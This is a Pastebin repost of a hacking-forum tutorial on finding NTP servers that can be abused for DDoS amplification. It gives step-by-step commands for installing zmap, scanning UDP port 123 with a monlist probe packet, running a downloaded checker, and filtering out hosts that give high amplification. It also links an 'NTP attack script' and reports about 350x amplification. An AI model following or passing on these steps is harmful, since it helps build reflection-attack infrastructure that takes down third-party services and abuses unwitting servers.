Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- NTP scanning and filtering tutorial*
- *All the scripts used arent coded by me and I didnt invent any of this. Im just sharing it with you guys because sharing is caring.
- Why I made this tutorial
- I just do this to help other people that dont know how to do this. And I couldnt really find any other HQ thread that covers NTP scanning and filtering.
- Requirements
- 1. A VPS / Dedicated server that you can scan on (see 'Hosting' for some hosts). (I use centos 6.x)
- 2. Alot of bandwith
- 3. ntpchecker: http://www.mediafire.com/download/69htm0...ntpchecker
- 4. ntp_123_monlist.pkt: http://www.mediafire.com/download/2c369n...onlist.pkt
- 5. A brain (jk you wont need one)
- Hosting for scanning
- Here are some hosting that I think are good for scanning:
- http://ecatel.co.uk/
- http://www.ovh.com/ca/en/
- http://www.soyoustart.com/ca/en/
- https://www.kimsufi.com/en/
- http://colocrossing.com/
- https://www.datashack.net/ (This is the one that I used and I had pretty good results Oui)
- How to scan
- Spoiler (Click to Hide)
- Update your server
- Code
- yum -y update
- Install repositorys
- Centos 6:
- Code
- wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
- sudo rpm -Uvh epel-release-6-8.noarch.rpm
- Centos 7:
- Code
- wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-5.noarch.rpm
- sudo rpm -Uvh epel-release-7-5.noarch.rpm
- Install dependencies
- Code
- yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c
- Install Zmap
- Code
- yum -y install zmap
- - Upload the NTPChecker to your server -
- - Upload the ntp_123_monlist.pkt to your server -
- Start the scan
- Code
- screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt
- It can take pretty long please wait it out.
- Run the ntpchecker
- Give it permissions first:
- Code
- chmod 777 ntpchecker
- Run the checker:
- Code
- screen ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1
- Filter the list
- Code
- awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt
- Enjoy!
- (My results where about 350x amplification: http://prntscr.com/9m34rx http://prntscr.com/9mhwrl )
- Extra info
- - If you have any issues post them below. -
- - NTP attack script: http://pastebin.com/raw/PJeYk4Bc (Thanks for the amazing script: https://hackforums.net/member.php?action...id=2623266).
- - I usually type screen first and when it opens the screen I type the command. -
- This is for educational purposes only.
- Thanks to:
- Google
- All of hackforums
- https://hackforums.net/member.php?action...id=2350472 for the dstat
- This was my first tutorial. Please leave a thanks if you have enjoyed this tutorial. Black Hat
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement